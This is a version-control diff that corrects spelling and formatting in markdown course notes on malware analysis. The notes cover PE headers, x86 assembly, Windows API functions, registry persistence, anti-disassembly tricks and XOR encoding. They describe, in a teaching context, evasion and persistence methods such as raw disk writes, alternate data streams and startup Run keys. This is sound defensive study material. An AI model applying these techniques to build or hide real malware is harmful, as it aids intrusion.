- However is largely ineffective against sophisticated malware. - However, it is largely ineffective against sophisticated malware.
##### Techniques ##### Techniques
- Using **antivirus tools** to confirm maliciousness - Using **antivirus tools** to confirm maliciousness
- virus total is an online tool to scan files for known malware - VirusTotal is an online tool to scan files for known malware
- Using **hashes** to identify malware - Using **hashes** to identify malware
- When the file is run through a hashing algorithm (often `md5` or `SHA-1`) it uniquely identifies it. - When the file is run through a hashing algorithm (often `md5` or `SHA-1`) it uniquely identifies it.
- This is useful to see if other malware analysts have seen this malware - This is useful to see if other malware analysts have seen this malware
- Gleaning information from a **file’s strings**, functions and headers - Gleaning information from a **file’s strings**, functions and headers
- Note: microsoft uses the term wide character to describe its implementation of Uni-code strings. - Note: Microsoft uses the term wide character to describe its implementation of Unicode strings.
- Strings can return - Strings can return
- IP addresses to where the malware is sending/receiving - IP addresses to where the malware is sending/receiving
- Windows system calls like `GetLayout` & `SetLayout` which are used in windows graphics library - Windows system calls like `GetLayout` & `SetLayout` which are used in the Windows graphics library
- Windows libraries such as `GDI32.DLL` which is a graphics library. - Windows libraries such as `GDI32.DLL` which is a graphics library.
- Therefore we can infer this malware opens a GUI display - Therefore we can infer this malware opens a GUI display
- Note: strings will show the executable’s manifest at the end, a brief `xml` file. - Note: strings will show the executable’s manifest at the end, a brief `xml` file.
### Basic Dynamic Analysis ### Basic Dynamic Analysis
- Running the malware and observing its behaviour on the system in order to: - Running the malware and observing its behaviour on the system in order to:
- remove the infection - remove the infection
- produce effective signatures - produce effective signatures
- Is important to note that a safe environment should be set up, so that the malware can be run without risk of damage to your system or network - It is important to note that a safe environment should be set up, so that the malware can be run without risk of damage to your system or network
- Like basic static analysis, this can be useful but can miss important functionality - Like basic static analysis, this can be useful but can miss important functionality
### Advanced Static Analysis ### Advanced Static Analysis
- Reverse-engineering the malware’s internals by loading the executable into a disassembler - Reverse-engineering the malware’s internals by loading the executable into a disassembler
- This involves looking at the instructions to discover what the malware does - This involves looking at the instructions to discover what the malware does
- This requires an in-depth knowledge of disassembly, code constructs and windows operating system constructs - This requires an in-depth knowledge of disassembly, code constructs and Windows operating system constructs
#### Problems with Static Analysis #### Problems with Static Analysis
- Only shows us what is in the program - Only shows us what is in the program
- Not how it is used (if it used at all) - Not how it is used (if it is used at all)
- Might see potential filename - but is that file created or deleted - Might see potential filename - but is that file created or deleted
- Does it get used every time the program is run or under certain circumstances - Does it get used every time the program is run or under certain circumstances
- Unsure of sequence of events - Unsure of sequence of events
@@ -89,7 +89,7 @@ One of the most useful pieces of information we can gather about a program is th
When a library is statically linked, all code from that library is copied into the executable which makes the executable grow in size. When a library is statically linked, all code from that library is copied into the executable which makes the executable grow in size.
- It is difficult to differentiate between the programs code and the imported code as nothing in the PE header suggests the file contains linked code - It is difficult to differentiate between the program’s code and the imported code as nothing in the PE header suggests the file contains linked code
- This is the most uncommon method of linking - This is the most uncommon method of linking
##### Run-time Linking ##### Run-time Linking
@@ -97,7 +97,7 @@ When a library is statically linked, all code from that library is copied into t
- Run-time linking is commonly used by malware, especially when packed or obfuscated - Run-time linking is commonly used by malware, especially when packed or obfuscated
- Executable files connect to libraries only when that function is needed, **not at program start** - Executable files connect to libraries only when that function is needed, **not at program start**
- `GetProcAddress` and `LoadLibrary` allow the program to access any function in any library on the system. - `GetProcAddress` and `LoadLibrary` allow the program to access any function in any library on the system.
- This means when functions are used, we cannot tell statically which functions are linked. - This means when functions are used, we cannot tell statically which functions are linked.
##### Dynamic Linking ##### Dynamic Linking
@@ -108,24 +108,24 @@ When libraries are dynamically linked, the host OS searches for necessary librar
#### Commonly linked DLLs #### Commonly linked DLLs
- `Kernel32.dll` - `Kernel32.dll`
- Very common library contains core functionality such as access & manipulation of memory, files and hardware. - Very common library contains core functionality such as access & manipulation of memory, files and hardware.
- `User32.dll` - `User32.dll`
- This `DLL` contains all the user-interface components such as buttons, scrolling etc - This `DLL` contains all the user-interface components such as buttons, scrolling etc
#### Common imported functions #### Common imported functions
The PE file header also includes information about specific functions used by an executable. The names alone will give clues however microsoft documents everything on MSDN The PE file header also includes information about specific functions used by an executable. The names alone will give clues; however, Microsoft documents everything on MSDN
- `FindFirstFileW`, `FindNextFileW`, `FindClose` - `FindFirstFileW`, `FindNextFileW`, `FindClose`
- These all involve searching the users system for files - These all involve searching the user’s system for files
- `FindFirstFileW` will include a string for regex, so we can see if its searching for all files `./*` or a specific `myFile.exe` - `FindFirstFileW` will include a string for regex, so we can see if it’s searching for all files `./*` or a specific `myFile.exe`
- `ReadFile`, `WriteFile` - `ReadFile`, `WriteFile`
- `SetWindowsHookExW` - `SetWindowsHookExW`
- Often used to implement keylogs - Often used to implement keylogs
- `CreateWindowExW`, `DefWindowProcW`, `getWindowsTextW`, `setWindowsTextW` etc - `CreateWindowExW`, `DefWindowProcW`, `getWindowsTextW`, `setWindowsTextW` etc
- This relates to setting up a GUI - This relates to setting up a GUI
- `RegisterHotkey` - `RegisterHotkey`
- Find what this keypress is, to see what it does - Find what this keypress is, to see what it does
#### PE Header Summary #### PE Header Summary
@@ -137,4 +137,3 @@ The PE file header also includes information about specific functions used by an
| Sections | Names of sections in the file and their sizes on disk and in memory | | Sections | Names of sections in the file and their sizes on disk and in memory |
| Subsystem | Indicates whether the program is a command-line or GUI application | | Subsystem | Indicates whether the program is a command-line or GUI application |
| Resources | Strings, icons, menus | | Resources | Strings, icons, menus |
+12 -13
View File
@@ -17,7 +17,7 @@ Programs = data structures + algorithms
##### External Actions ##### External Actions
- Programs also have effects outside the program - Programs also have effects outside the program
- Can monitor the external actions and get an idea about the programs activity - Can monitor the external actions and get an idea about the program’s activity
- Not just what the program does but also the order the program performs those actions - Not just what the program does but also the order the program performs those actions
##### Running the Malware ##### Running the Malware
@@ -25,34 +25,34 @@ Programs = data structures + algorithms
Note: Note:
- It is important that dynamic analysis is done after the program has been statically analysed - It is important that dynamic analysis is done after the program has been statically analysed
- This is because the malware can put your system and network at risk - This is because the malware can put your system and network at risk
- Can be tricky to make the malware run - Can be tricky to make the malware run
- If its distributed as a `.exe`, then we can just run it - If it’s distributed as an `.exe`, then we can just run it
- But might do different things based on command line options - But might do different things based on command line options
- If its distributed as `.DLL`, then its more complicated - If it’s distributed as a `.DLL`, then it’s more complicated
- Can use `rundll32.exe` to start it and specify the export to call - Can use `rundll32.exe` to start it and specify the export to call
- As a last resort you can force the `.dll` to behave as a `.exe` by editing the PE header - As a last resort you can force the `.dll` to behave as an `.exe` by editing the PE header
#### Monitoring with Process Monitor - ProcMon #### Monitoring with Process Monitor - ProcMon
Process Monitor or procmon is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, process and thread activity. Process Monitor or procmon is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, process and thread activity.
- Procmon monitors all system calls - Procmon monitors all system calls
- Because there are so many system calls (around 50,000 per minute) it is import to filter by type - Because there are so many system calls (around 50,000 per minute) it is important to filter by type
- Filter by: - Filter by:
- **Registry** - Tells us how malware installs itself into the registry - **Registry** - Tells us how malware installs itself into the registry
- **File System** - Shows us all the files that the malware creates or config files it uses - **File System** - Shows us all the files that the malware creates or config files it uses
- **Process Activity** - Tells us if the malware spawns any additional processes - **Process Activity** - Tells us if the malware spawns any additional processes
- **Network** - Shows us if the malware is listening on any specific ports - **Network** - Shows us if the malware is listening on any specific ports
#### Comparing Registry Snapshots - RegShot #### Comparing Registry Snapshots - RegShot
An open-source registry comparison tool that allows you to take and compare two registry snapshots. An open-source registry comparison tool that allows you to take and compare two registry snapshots.
- We can look for added values - We can look for added values
- A malware has added a new registry key - Malware has added a new registry key
- Or modified keys - Or modified keys
- A malware has modified a registry perhaps inserting itself into non-malicious software - Malware has modified a registry, perhaps inserting itself into non-malicious software
### General Steps ### General Steps
@@ -61,4 +61,3 @@ An open-source registry comparison tool that allows you to take and compare two
3. Get an initial snapshot with RegShot 3. Get an initial snapshot with RegShot
4. Run the malware 4. Run the malware
5. Take another snapshot and compare, also analysing procmon and process explorer. 5. Take another snapshot and compare, also analysing procmon and process explorer.
+29 -28
View File
@@ -1,13 +1,13 @@
# Crash Course in x86 Assembler # Crash Course in x86 Assembler
- Malware authors creates programs at the high-level language and use a compiler to generate machine code to by run by the CPU - Malware authors create programs in a high-level language and use a compiler to generate machine code to be run by the CPU
- Malware analysts operate at the low-level language. Using disassembler to generate assembly code from the machine code to try and understand how the malware works - Malware analysts operate at the low-level language, using a disassembler to generate assembly code from the machine code to try and understand how the malware works
![1646418960.png](img/1646418960.png) ![1646418960.png](img/1646418960.png)
### x86 Architecture ### x86 Architecture
x86 architecture follows the Von Neuman architecture and has three hardware components x86 architecture follows the von Neumann architecture and has three hardware components
- CPU executes code - CPU executes code
- Main memory (RAM) stores all data and code instructions - Main memory (RAM) stores all data and code instructions
@@ -23,7 +23,7 @@ The main memory for a single program can be divided into the following four majo
**Data** - Contains values that are put in place when a program is initially loaded **Data** - Contains values that are put in place when a program is initially loaded
**Code** - Includes the instructions fetched by the CPU to execute the programs tasks. The code controls what the program does **Code** - Includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does
**Heap** - The heap is used for dynamic memory during program execution, to create (or allocate) new values and eliminate (free) values that the program no longer needs. The heap’s size changes frequently while the program runs **Heap** - The heap is used for dynamic memory during program execution, to create (or allocate) new values and eliminate (free) values that the program no longer needs. The heap’s size changes frequently while the program runs
@@ -37,11 +37,11 @@ Each instruction is comprised of an **opcode** and zero or more **operands**.
**operand** - argument or data **operand** - argument or data
**endianess** **endianness**
- Whether the most significant bit is at the start or the end of a binary stream. - Whether the most significant bit is at the start or the end of a binary stream.
- **Big-endian** is where the most significant bit is first - **Big-endian** is where the most significant bit is first
- **Little-endian** is where the least significant bit is first - **Little-endian** is where the least significant bit is first
Disassemblers translate opcodes into human-readable instructions e.g. Disassemblers translate opcodes into human-readable instructions e.g.
@@ -69,13 +69,13 @@ A register is a small amount of data storage available to the CPU, that’s real
![1646419963.png](img/1646419963.png) ![1646419963.png](img/1646419963.png)
All general registers are 32-bits but can be referenced as either 32 or 16 bits in assembly code (for backwards compatibility reasons) All general registers are 32 bits but can be referenced as either 32 or 16 bits in assembly code (for backwards compatibility reasons)
`EDX` - full 32-bits `EDX` - full 32 bits
`DX` - lower 16 bits `DX` - lower 16 bits
Registers `EAX`, `EBX`, `ECX`, `EDX` can be referenced as 8 bit registers Registers `EAX`, `EBX`, `ECX`, `EDX` can be referenced as 8-bit registers
![1646420117.png](img/1646420117.png) ![1646420117.png](img/1646420117.png)
@@ -87,7 +87,7 @@ Some x86 instructions use specific registers by definition.
###### Flags ###### Flags
The `EFLAGS` register is a status register 32-bits big, this means it can store 32 flags. During execution, each flag is either set to 1 if true The `EFLAGS` register is a status register 32 bits big; this means it can store 32 flags. During execution, each flag is set to 1 if true
- **ZF** - The zero flag is set if the result of the operation was equal to zero - **ZF** - The zero flag is set if the result of the operation was equal to zero
- **CF** - The carry flag is set when the result of an operation is too large or too small for the destination operand. - **CF** - The carry flag is set when the result of an operation is too large or too small for the destination operand.
@@ -102,7 +102,7 @@ The `EFLAGS` register is a status register 32-bits big, this means it can store
`nop` - no operation - does nothing `nop` - no operation - does nothing
When issued, execution simply preceeds to the next instruction When issued, execution simply proceeds to the next instruction
#### The Stack #### The Stack
@@ -118,17 +118,17 @@ Main code calls and temporarily transfers execution to functions before returnin
Many functions contain a **prologue** and an **epilogue** Many functions contain a **prologue** and an **epilogue**
- The **prologue** is a few lines of code at the start of the function which prepares the stack and registers for use within the function - The **prologue** is a few lines of code at the start of the function which prepare the stack and registers for use within the function
- The **epilogue** is at the end of the function and restores the stack and registers to their state before the function was called - The **epilogue** is at the end of the function and restores the stack and registers to their state before the function was called
When a function is called: When a function is called:
1. Arguments are placed on the stack using `push` instructions 1. Arguments are placed on the stack using `push` instructions
2. A function called using `memory_location` which changes `EIP` to the address of the first instruction in the function and returns `EIP` to main code once the function is finished 2. A function is called using `memory_location` which changes `EIP` to the address of the first instruction in the function and returns `EIP` to main code once the function is finished
3. The function prologue pushes local variables, parameters and `EBP` onto the stack 3. The function prologue pushes local variables, parameters and `EBP` onto the stack
4. The function executes 4. The function executes
5. The function epilogue restores the stack, `ESP` is adjusted to free local variables, and `EBP` is restored so that the calling function can address its variables. 5. The function epilogue restores the stack, `ESP` is adjusted to free local variables, and `EBP` is restored so that the calling function can address its variables.
- The `leave` instruction sets `ESP` equal to `EBP` and pops `EBP` off the stack - The `leave` instruction sets `ESP` equal to `EBP` and pops `EBP` off the stack
6. The function returns by calling `ret`, this pops the return address off the stack into `EIP` 6. The function returns by calling `ret`, this pops the return address off the stack into `EIP`
7. The stack is adjusted to remove sent arguments 7. The stack is adjusted to remove sent arguments
@@ -138,7 +138,7 @@ When a function is called:
###### Passing Arguments ###### Passing Arguments
`c` functions and windows `api` calls, functions are called differently. `c` functions and Windows `api` calls use different calling conventions.
There are two things to think about There are two things to think about
@@ -164,14 +164,16 @@ ret = test (a, b, c);
- Return value stored in `EAX` - Return value stored in `EAX`
- ```assembly - Example:
push c
push b ```assembly
push a push c
call test push b
add esp, 12 push a
mov ret, eax call test
``` add esp, 12
mov ret, eax
```
- Note line 5 is the caller cleaning up the stack - Note line 5 is the caller cleaning up the stack
@@ -189,12 +191,11 @@ ret = test (a, b, c);
- In `fastcall` the first few arguments (typically first two) are passed in registers `EDX` and `ECX` - In `fastcall` the first few arguments (typically first two) are passed in registers `EDX` and `ECX`
- Additional arguments are loaded right to left - Additional arguments are loaded right to left
- Calling function is responsible for cleaning the stack - Calling function is responsible for cleaning the stack
- This is quicker as less data needs to be pushed to and retrived from the stack - This is quicker as less data needs to be pushed to and retrieved from the stack
- # Functions have underscore prefix, name followed by `@` and length of arguments - Functions have an underscore prefix, name followed by `@` and length of arguments
When debugging windows functions, you can look at `EBP` to retrace the route the program took through the code When debugging Windows functions, you can look at `EBP` to retrace the route the program took through the code
#### Conditionals #### Conditionals
![1646421441.png](img/1646421441.png) ![1646421441.png](img/1646421441.png)
+2 -4
View File
@@ -4,7 +4,7 @@
### Global vs Local Variables ### Global vs Local Variables
*Globbal variables* can be accessed and used by any function in the program. *Global variables* can be accessed and used by any function in the program.
*Local variables* can be accessed only by the function in which they are defined. *Local variables* can be accessed only by the function in which they are defined.
@@ -107,7 +107,7 @@ while (status == 0)
} }
``` ```
The assembly for this code will look similar from before however it lacks the *increment* section. The assembly for this code will look similar to before; however, it lacks the *increment* section.
```assembly ```assembly
mov [ebp+var_4], 0 mov [ebp+var_4], 0
@@ -151,8 +151,6 @@ void main()
} }
``` ```
![1646767431.png](img/1646767431.png) ![1646767431.png](img/1646767431.png)
### Switch Statements ### Switch Statements
+31 -31
View File
@@ -4,17 +4,17 @@
##### Types and Hungarian Notation ##### Types and Hungarian Notation
`DWORD` - 32 bit unsigned integer `DWORD` - 32-bit unsigned integer
`WORD` - 16 bit unsigned integer `WORD` - 16-bit unsigned integer
Hungarian notation is where variables are prefixed with their data type e.g. `dwSize` has prefix `dw` for `DWORD` indicating it is a 32 bit unsigned int Hungarian notation is where variables are prefixed with their data type e.g. `dwSize` has prefix `dw` for `DWORD` indicating it is a 32-bit unsigned int
| Type and Prefix | Description | | Type and Prefix | Description |
| ------------------- | ------------------------------------------------------------ | | ------------------- | ------------------------------------------------------------ |
| `WORD` (`w`) | A 16 bit unsigned vvalue | | `WORD` (`w`) | A 16-bit unsigned value |
| `DWORD` (`dw`) | A double word, 32-bit unsigned value | | `DWORD` (`dw`) | A double word, 32-bit unsigned value |
| Handles (`H`) | A reference to an object. The information stored in the handle is no documented, and the handle should be manipulated only by the Windows API | | Handles (`H`) | A reference to an object. The information stored in the handle is not documented, and the handle should be manipulated only by the Windows API |
| Long Pointer (`LP`) | A pointer to another type e.g. `LPByte` is a pointer to a byte. Strings are usually prefixed with `LP` because they are actually pointers. | | Long Pointer (`LP`) | A pointer to another type e.g. `LPByte` is a pointer to a byte. Strings are usually prefixed with `LP` because they are actually pointers. |
| Callback | Represents a function that will be called by the Windows API | | Callback | Represents a function that will be called by the Windows API |
@@ -23,8 +23,8 @@ Hungarian notation is where variables are prefixed with their data type e.g. `dw
*Handles* are items that have been opened or created in the OS, such as a window, process, module, menu, file etc. *Handles* are items that have been opened or created in the OS, such as a window, process, module, menu, file etc.
- Handles are like pointers in that they refer to an object or memory location - Handles are like pointers in that they refer to an object or memory location
- Unlike pointers handles cannot be used in arithmetic operations - Unlike pointers handles cannot be used in arithmetic operations
- The only use case is storing it and use it later in a function call - The only use case is storing it and using it later in a function call
##### File System Functions ##### File System Functions
@@ -33,8 +33,8 @@ Most malware will interact with the system by creating or modifying files. Micro
- `CreateFile` - used to create and open files. It can open existing files, pipes, streams and I/O devices. - `CreateFile` - used to create and open files. It can open existing files, pipes, streams and I/O devices.
- `ReadFile` and `WriteFile` - used for reading and writing to the contents of files. Both operate on files as a stream. - `ReadFile` and `WriteFile` - used for reading and writing to the contents of files. Both operate on files as a stream.
- `CreateFileMapping` and `MapViewOfFile` - *File mappings* are commonly used by malware writers because they allow a file to be loaded into memory and manipulated easily. - `CreateFileMapping` and `MapViewOfFile` - *File mappings* are commonly used by malware writers because they allow a file to be loaded into memory and manipulated easily.
- `CreateFileMapping` loads a file from disk into memory - `CreateFileMapping` loads a file from disk into memory
- `MapViewOfFile` returns a pointer to the base address of the mapping, this can be used to access the file in memory - `MapViewOfFile` returns a pointer to the base address of the mapping, this can be used to access the file in memory
##### Special Files ##### Special Files
@@ -42,10 +42,10 @@ Windows has a number of file types that can be accessed much like regular files,
###### Shared Files ###### Shared Files
Sharted files are special files with names that start with `\\serverName\share` or `\\?\serverName\share` Shared files are special files with names that start with `\\serverName\share` or `\\?\serverName\share`
- They access directories or files in a shared folder stored on a network. - They access directories or files in a shared folder stored on a network.
- `\\?\` prefix tells the OS to disable all string parsing and allows access to longer filenames - `\\?\` prefix tells the OS to disable all string parsing and allows access to longer filenames
###### Files Accessible via Namespaces ###### Files Accessible via Namespaces
@@ -58,39 +58,39 @@ The `Win32` device namespace (prefix `\\.\`) is often used to access physical de
- `\\.\PhysicalDisk1` to directly access the disk while ignoring its file system - `\\.\PhysicalDisk1` to directly access the disk while ignoring its file system
- By doing this malware can read and write data to an unallocated sector in the drive without creating a file - By doing this malware can read and write data to an unallocated sector in the drive without creating a file
- This is very good for avoiding detection - This is very good for avoiding detection
###### Alternate Data Streams ###### Alternate Data Streams
ADS allows additional data to be addwed to an existing file within `NTFS` ADS allows additional data to be added to an existing file within `NTFS`
- The extra data doesn’t show up in a directory listing nor when displaying the contents of the file - The extra data doesn’t show up in a directory listing nor when displaying the contents of the file
- It’s only visible when accessing the stream - It’s only visible when accessing the stream
- ADS data is named `normalFile.txt:Stream:$DATA` - ADS data is named `normalFile.txt:Stream:$DATA`
## The Windows Registry ## The Windows Registry
The *Windows registry* is used to store OS and program configuration information, such as settings and options. The *Windows registry* is used to store OS and program configuration information, such as settings and options.
In early versions of windows the registry was just a hierarchy of `.ini` files to improve performance. In early versions of Windows the registry was just a hierarchy of `.ini` files to improve performance.
Malware often uses the registry for *persistence* or configuration data. The malware adds entries into the registry that will allow it to run automatically when the computer boots. Malware often uses the registry for *persistence* or configuration data. The malware adds entries into the registry that will allow it to run automatically when the computer boots.
- **Root key** - The registry is divided into five top-level sections called *root keys* (sometimes called `HKEY`) - **Root key** - The registry is divided into five top-level sections called *root keys* (sometimes called `HKEY`)
- **Subkey** - Akin to a subfolder within a folder - **Subkey** - Akin to a subfolder within a folder
- **Key** - A key is a folder in the registry that can contain additional folders or values - **Key** - A key is a folder in the registry that can contain additional folders or values
- The root key and subkey are both keys - The root key and subkey are both keys
- **Value entry** - A *value entry* is an ordered pair with a name and value - **Value entry** - A *value entry* is an ordered pair with a name and value
- **Value or data** - The data stored in a registry entry - **Value or data** - The data stored in a registry entry
#### Registry Root Keys #### Registry Root Keys
- `HKEY_LOCAL_MACHINE` (`HKLM`) - Stores settings that are global to the local machine - `HKEY_LOCAL_MACHINE` (`HKLM`) - Stores settings that are global to the local machine
- Contains ` HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run` - Contains ` HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- This is the key that stores a list of executables that are run at start up - This is the key that stores a list of executables that are run at start up
- `HKEY_CURRENT_USER` (`HKCU`) - Stores settings specific to the current user - `HKEY_CURRENT_USER` (`HKCU`) - Stores settings specific to the current user
- This is a virtual key, stored in `HKEY_USERS\SID` - This is a virtual key, stored in `HKEY_USERS\SID`
- Where `SID` is the security identifier of the user currently logged in - Where `SID` is the security identifier of the user currently logged in
- `HKEY_CLASSES ROOT` - Stores information defining types - `HKEY_CLASSES ROOT` - Stores information defining types
- `HKEY_CURRENT_CONFIG` - Stores settings about the current hardware configuration, specifically differences between the current and standard configuration - `HKEY_CURRENT_CONFIG` - Stores settings about the current hardware configuration, specifically differences between the current and standard configuration
- `HKEY_USERS` - Defines settings for the default user, new user and current user - `HKEY_USERS` - Defines settings for the default user, new user and current user
@@ -114,35 +114,35 @@ You can use RegEdit to view and edit the registry.
To store malicious code: To store malicious code:
- Malware often uses a `dll` to load itself into another process - Malware often uses a `dll` to load itself into another process
- This is because one process can only contain one `.exe` - This is because one process can only contain one `.exe`
By using Windows `dll`s: By using Windows `dll`s:
- Windows dlls contain the functionality to interact with the OS - Windows dlls contain the functionality to interact with the OS
- By looking at what dlls are used can help find the functionality of the malware - Looking at what dlls are used can help find the functionality of the malware
By using third-party `dll`s By using third-party `dll`s
- This can provide further insight to what the malware does - This can provide further insight to what the malware does
- e.g. if it uses a mozilla `dll` instead of the standard windows api, it might be usiing functions not found in the windows api such as encryption - e.g. if it uses a Mozilla `dll` instead of the standard Windows API, it might be using functions not found in the Windows API such as encryption
`DLL`s are similar to `EXE`s, there’s a flag in the PE to indicate the file is a dll. `DLL`s are similar to `EXE`s, there’s a flag in the PE to indicate the file is a dll.
#### Processes #### Processes
- Malware can execute outside the current program by creating a new process or modifying an existing one. - Malware can execute outside the current program by creating a new process or modifying an existing one.
- A process is a program being executed by Windows - A process is a program being executed by Windows
- Each process manages its own resources such as open handles and memory - Each process manages its own resources such as open handles and memory
- A process contains one or more threads that are executed by the CPU. - A process contains one or more threads that are executed by the CPU.
- `CreateProcess` can be used to create a new process - `CreateProcess` can be used to create a new process
#### Threads #### Threads
Processes are the container for execution, but *threads* are what the windows OS executes. Processes are the container for execution, but *threads* are what the Windows OS executes.
- Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads - Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads
- A process contains one or more threads, which execute part of the code within a process. - A process contains one or more threads, which execute part of the code within a process.
- Threads within a process all share a memory space but have seperate registers and stack - Threads within a process all share a memory space but have separate registers and stacks
`CreateThread` can be used to create new threads `CreateThread` can be used to create new threads
@@ -154,10 +154,10 @@ Processes are the container for execution, but *threads* are what the windows OS
Another way for malware to execute additional code is by installing it as a *service*. Another way for malware to execute additional code is by installing it as a *service*.
- Windows allows tasks to run without their own processes or threads by using services that run as background applications - Windows allows tasks to run without their own processes or threads by using services that run as background applications
- Code is scheduled and run by the Windows service manager without user input. - Code is scheduled and run by the Windows service manager without user input.
- Services are normally run as `SYSTEM` or another privileged account - Services are normally run as `SYSTEM` or another privileged account
- Key service functions: - Key service functions:
- `OpenSCManager` Returns a handle to the service control manager - `OpenSCManager` Returns a handle to the service control manager
- `CreateService` - Adds a new service to the service control manager - `CreateService` - Adds a new service to the service control manager
- Allows caller to specify whether the service will start automatically at boot time, or started manually - Allows the caller to specify whether the service will start automatically at boot time or be started manually
- `StartService` Starts the service, only used if service needs to be started manually - `StartService` Starts the service, only used if service needs to be started manually
+13 -13
View File
@@ -16,11 +16,11 @@ Linear disassembly strategy iterates over a block of code, disassembling one ins
This method is used by IDA This method is used by IDA
- The key difference between linear and flow-oriented is that the disassembler doesn’t blindly irate over a buffer, assuming the data is noting but instructions packed neatly together - The key difference between linear and flow-oriented is that the disassembler doesn’t blindly iterate over a buffer, assuming the data is nothing but instructions packed neatly together
- Instead it examines each instruction and builds a list of locations to disassemble - Instead it examines each instruction and builds a list of locations to disassemble
- Most flow-oriented disassemblers will process the false branch of a conditional jump - Most flow-oriented disassemblers will process the false branch of a conditional jump
- Pressing the `C` key turns the cursor location into code - Pressing the `C` key turns the cursor location into code
- Pressing the `D` key turns the cursor location into data - Pressing the `D` key turns the cursor location into data
### Anti-Disassembler Techniques ### Anti-Disassembler Techniques
@@ -40,7 +40,7 @@ Another anti-disassembly technique commonly found in the wild is composed of a s
Under some conditions, no traditional assembly listing will accurately represent the instructions that are executed. We use the term *impossible disassembly* for such conditions, but the term isn’t strictly accurate. You could disassemble these techniques, but you would need a vastly different representation of code than what is currently provided by disassemblers. Under some conditions, no traditional assembly listing will accurately represent the instructions that are executed. We use the term *impossible disassembly* for such conditions, but the term isn’t strictly accurate. You could disassemble these techniques, but you would need a vastly different representation of code than what is currently provided by disassemblers.
- A *rogue byte* is a byte placed after a conditional jump instruction - A *rogue byte* is a byte placed after a conditional jump instruction
- This means the real instruction that follows will not be disassembled - This means the real instruction that follows will not be disassembled
![1647963505.png](img/1647963505.png) ![1647963505.png](img/1647963505.png)
@@ -77,15 +77,15 @@ E8 db 0E8h
C3 retn C3 retn
``` ```
- This only shows the instructions that are relevent to understanding the program - This only shows the instructions that are relevant to understanding the program
- However this solution may interfere with flow graphs. - However this solution may interfere with flow graphs.
- Since its difficult to tell how the `xor`, `pop` and `retn` instructions are used - Since it’s difficult to tell how the `xor`, `pop` and `retn` instructions are used
### Obscuring Flow Control ### Obscuring Flow Control
#### The Function Pointer Problem #### The Function Pointer Problem
If function pointers are used in handwritten assembly or crafted in a **nonstandard way** in source code, the results can be difficult to reverseengineer without dynamic analysis. If function pointers are used in handwritten assembly or crafted in a **nonstandard way** in source code, the results can be difficult to reverse-engineer without dynamic analysis.
```assembly ```assembly
004011D0 sub_4011D0 proc near ; CODE XREF: _main+19p 004011D0 sub_4011D0 proc near ; CODE XREF: _main+19p
@@ -124,10 +124,10 @@ We can manually add these in using `AddCodeXref`
#### Return Pointer Abuse #### Return Pointer Abuse
- `Call` is a combination of `jmp` and `push` - `Call` is a combination of `jmp` and `push`
- As it jumps to the new function and pushes a return address onto the stack - As it jumps to the new function and pushes a return address onto the stack
- `retn` instruction pops the value from the top of the stack and jumps to it. - `retn` instruction pops the value from the top of the stack and jumps to it.
- Typically used to return a function call - Typically used to return a function call
- However no reason why malware authors can’t use it to obscure code - However no reason why malware authors can’t use it to obscure code
```assembly ```assembly
004011C0 sub_4011C0 proc near ; CODE XREF: _main+19p 004011C0 sub_4011C0 proc near ; CODE XREF: _main+19p
@@ -152,5 +152,5 @@ We can manually add these in using `AddCodeXref`
- Here `var_4` is set to the constant `-4` - Here `var_4` is set to the constant `-4`
- This means `add [esp+4+var_4], 5` is actually `add [esp+4+(-4)]` - This means `add [esp+4+var_4], 5` is actually `add [esp+4+(-4)]`
- `0x4011C9 + 0x5 = 0x4011CA` - `0x4011C9 + 0x5 = 0x4011CA`
- The `retn` instruction jumps to that memory location - The `retn` instruction jumps to that memory location
+30 -30
View File
@@ -1,37 +1,37 @@
# Data Encoding # Data Encoding
Malware uses encoding for a variety of reasons, the main one is for encrypting network-based communication. Malware uses encoding for a variety of reasons; the main one is for encrypting network-based communication.
- Malware needs to hide its intent - Malware needs to hide its intent
- This applies to both its operation but also to the data it uses - This applies both to its operation and to the data it uses
- Data encoding refers to all forms of content modification used for the purpose of hiding intent - Data encoding refers to all forms of content modification used for the purpose of hiding intent
- Malware will use data encoding to: - Malware will use data encoding to:
- Hide configuration information - Hide configuration information
- Save information to a staging file before stealing it - Save information to a staging file before stealing it
- To store strings used by the malware - Store strings used by the malware
- Imagine a key logger, logs what the user is searching for. The file would come up - Imagine a key logger, logs what the user is searching for. The file would come up
- Disguise itself as a legitimate tool - Disguise itself as a legitimate tool
When analysing the goal is to first find the encryption functions and then using that to decode whatever information is encoded. When analysing, the goal is to first find the encryption functions and then use them to decode whatever information is encoded.
#### Mechanisms for data encoding #### Mechanisms for data encoding
- Malware could (and does) use standard cryptographic algorithms for data encoding - Malware could (and does) use standard cryptographic algorithms for data encoding
- These algorithms have high entropy - These algorithms have high entropy
- This can be seen in IDA - This can be seen in IDA
- Ransomware will use standard encryption as they want the data to not be decrypted - Ransomware will use standard encryption as they want the data to not be decrypted
- But malware is just as likely to use simple techniques - But malware is just as likely to use simple techniques
- Are small enough to be used in space-constrained environments - Are small enough to be used in space-constrained environments
- Less obvious than more complex ciphers - Less obvious than more complex ciphers
- Low overhead, little impact on performance - Low overhead, little impact on performance
- Not expecting immunity from being cracked, rather simply looking for an easy way to prevent basic analysis. - Not expecting immunity from being cracked, rather simply looking for an easy way to prevent basic analysis.
#### XOR Cipher #### XOR Cipher
- Common mechanism used by malware authors - Common mechanism used by malware authors
- Convenient to use - Convenient to use
- Simple to implement (one instruction) - Simple to implement (one instruction)
- Reversible - same function can encode and decode - Reversible - same function can encode and decode
##### Brute Forcing xor encoding ##### Brute Forcing xor encoding
@@ -40,15 +40,15 @@ When analysing the goal is to first find the encryption functions and then using
- Simply take a portion of the encoded text and attempt to decode it using each possible byte - Simply take a portion of the encoded text and attempt to decode it using each possible byte
- Look at each result to see if anything interesting pops out - Look at each result to see if anything interesting pops out
- Can also be pre-computed if you know a string might be present - Can also be pre-computed if you know a string might be present
- e.g. `This program cannot be run in DOS mode` - e.g. `This program cannot be run in DOS mode`
- $k \oplus 0=k$, in the pre-ample there’s a lot of 0s, which means the key will be visible - $k \oplus 0=k$, in the preamble there are a lot of 0s, which means the key will be visible
